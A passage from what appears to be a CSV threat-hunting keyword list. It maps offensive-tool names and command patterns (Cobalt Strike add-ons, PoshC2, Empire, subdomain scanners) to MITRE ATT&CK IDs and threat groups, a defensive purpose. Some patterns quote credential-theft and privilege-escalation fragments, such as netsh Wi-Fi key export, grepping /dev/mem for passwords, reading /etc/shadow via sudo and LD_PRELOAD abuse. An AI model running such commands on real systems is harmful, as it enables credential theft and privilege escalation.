tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*Sticky-Keys-Slayer*,offensive_tool_keyword,Sticky-Keys-Slayer,Scans for accessibility tools backdoors via RDP,T1078 - T1015 - T1203,TA0003 - TA0007 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/linuz/Sticky-Keys-Slayer,1,1,N/A,N/A,4,319,80,2018-03-16T15:59:41Z,2016-08-06T18:55:28Z -*StickyNotesExtract.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*stinger_client -*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,0,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*stinger_client.py*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*stinger_server.exe*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*stopdaisy*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*StopInveigh*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*-stop-keylogger*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,0,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*stop-keystrokes*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - 
T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*stormshadow07*,offensive_tool_keyword,HackTheWorld,An Python Script For Generating Payloads that Bypasses All Antivirus so far,T1566 - T1106 - T1027 - T1059 - T1070,TA0002 - TA0005 - TA0008 - TA0011,N/A,N/A,Defense Evasion,https://github.com/stormshadow07/HackTheWorld,1,1,N/A,N/A,9,866,179,2020-04-28T20:17:54Z,2018-02-17T11:46:40Z -*STRING firefox about:logins*,offensive_tool_keyword,Harvester_OF_SORROW,The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. 
Finally it sends the screenshot to an email of your choosing.,T1056.001 - T1113 - T1512 - T1566.001 - T1059.006,TA0004 - TA0009 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*String netsh wlan export profile key=clear*,offensive_tool_keyword,wifigrabber,grab wifi password and exfiltrate to a given site,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*strings -n * /dev/mem | grep -i pass*,greyware_tool_keyword,grep,search for passwords in memory and core dumps,T1005 - T1083 - T1213,TA0006,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*strip_bof.ps1*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*strip2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*strip-bof -Path *,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,0,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*StrongLoader_x64.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - 
T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*struts_ext_v2.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*su rootz*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ahrixia/CVE_2022_0847,1,0,N/A,N/A,1,21,15,2022-03-08T13:15:35Z,2022-03-08T12:43:43Z -*subbrute*,offensive_tool_keyword,subbrute,SubBrute is a community driven project with the goal of creating the fastest. and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting. This design also provides a layer of anonymity. 
as SubBrute does not send traffic directly to the targets name servers.,T1210.001 - T1190 - T1574.001,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/TheRook/subbrute,1,1,N/A,N/A,10,3150,653,2022-01-13T09:25:59Z,2012-06-10T01:08:20Z -*subdomain_takeovers.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*subdomains-100.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*subdomains-1000.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*subdomains-10000.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*subdomains-500.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*subdomains-top1million-110000.txt*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*subdomains-top1million-20000.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - 
T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*subdomains-uk-1000.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*subdomains-uk-500.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*subdomain-wordlist.txt*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*subfinder -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*subfinder -silent -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*subfinder --silent*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z 
-*subfinder*,offensive_tool_keyword,subfinder,SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.,T1210.001 - T1190 - T1574.001,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/subfinder/subfinder,1,0,N/A,N/A,10,8298,1128,2023-10-02T15:13:41Z,2018-03-31T09:44:57Z -*sublist3r -v -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Sublist3r*,offensive_tool_keyword,Sublist3r,Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. 
The credit goes to TheRook who is the author of subbrute.,T1210.001 - T1190 - T1574.001,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/aboul3la/Sublist3r,1,1,N/A,N/A,10,8697,2020,2023-10-01T21:58:10Z,2015-12-15T00:55:25Z -*Suborner.exe*,offensive_tool_keyword,Suborner,The Invisible Account Forger - A simple program to create a Windows account you will only know about ,T1098 - T1175 - T1033,TA0007 - TA0008 - TA0003,N/A,N/A,Persistence,https://github.com/r4wd3r/Suborner,1,1,N/A,N/A,5,452,58,2022-09-02T09:04:46Z,2022-04-26T00:12:58Z -*Suborner-master.zip*,offensive_tool_keyword,Suborner,The Invisible Account Forger - A simple program to create a Windows account you will only know about ,T1098 - T1175 - T1033,TA0007 - TA0008 - TA0003,N/A,N/A,Persistence,https://github.com/r4wd3r/Suborner,1,1,N/A,N/A,5,452,58,2022-09-02T09:04:46Z,2022-04-26T00:12:58Z -*Successfully connected* spawning shell?*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,0,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*Successfully cracked account password*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*Successfully dumped SAM and SYSTEM*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*sudo apache2 -f /etc/shadow*,greyware_tool_keyword,sudo,access sensitive files by abusing sudo permissions,T1548.001 - T1059.004,TA0004 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*sudo bloodhound*,offensive_tool_keyword,bloodhound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069,TA0007,N/A,N/A,Frameworks,https://github.com/fox-it/BloodHound.py,1,0,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*sudo LD_LIBRARY_PATH=. 
apache2*,greyware_tool_keyword,sudo,abusing LD_LIBRARY_PATH sudo option to escalade privilege,T1546.009 - T1059.004 - T1548.002,TA0004 - TA0002 - TA0003,N/A,N/A,Privilege Escalation,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*sudo LD_PRELOAD=/tmp/preload.so find*,greyware_tool_keyword,sudo,abusinf LD_PREDLOAD option to escalade privilege,T1546.009 - T1059.004 - T1548.002,TA0004 - TA0002 - TA0003,N/A,N/A,Privilege Escalation,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*sudo -nS id' && lse_sudo=true*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*sudo rmmod -r*,greyware_tool_keyword,rmmod,Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.,T1547.006 - T1070.006,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*sudo tmux new -s icebreaker*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*sudo_inject*,offensive_tool_keyword,sudo_inject,Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo token,T1055 - T1548.001 - T1059.002,TA0002 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nongiach/sudo_inject,1,1,N/A,N/A,7,649,122,2019-04-14T07:43:35Z,2019-03-24T22:06:22Z -*SUDO_KILLER*,offensive_tool_keyword,SUDO_KILLER,sudo exploitation #Abusing sudo #Exploiting Sudo #Linux Privilege Escalation #OSCP If you like the tool and for my personal motivation so as to develop other tools please a +1 star The tool can be used by pentesters. system admins. CTF players. students. 
System Auditors and trolls :).,T1078 - T1059 - T1204,TA0002 - TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/TH3xACE/SUDO_KILLER,1,1,N/A,N/A,10,1977,244,2023-08-02T08:53:48Z,2018-12-07T21:08:02Z -*sudomy.git*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,1,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -*sudopwn.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*SUID3NUM -*,offensive_tool_keyword,SUID3NUM,A standalone python2/3 script which utilizes pythons built-in modules to find SUID bins. separate default bins from custom bins. cross-match those with bins in GTFO Bins repository & auto-exploit those. all with colors! ( ?? ?? 
??),T1168 - T1553 - T1210 - T1059,TA0001 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Anon-Exploiter/SUID3NUM,1,0,N/A,N/A,6,570,129,2021-08-15T20:37:50Z,2019-10-12T07:40:24Z -*sullo/nikto*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -*SunloginClient_11.0.0.33162_X64.exe*,offensive_tool_keyword,POC,SunloginClient RCE vulnerable version,T1587,TA0001 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/sunlogin_rce,1,1,N/A,N/A,5,462,201,2022-02-16T16:11:42Z,2022-02-16T14:20:41Z -*superhedgy/AttackSurfaceMapper*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,1,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*Supernova.exe -*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*Supernova-main.zip*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - 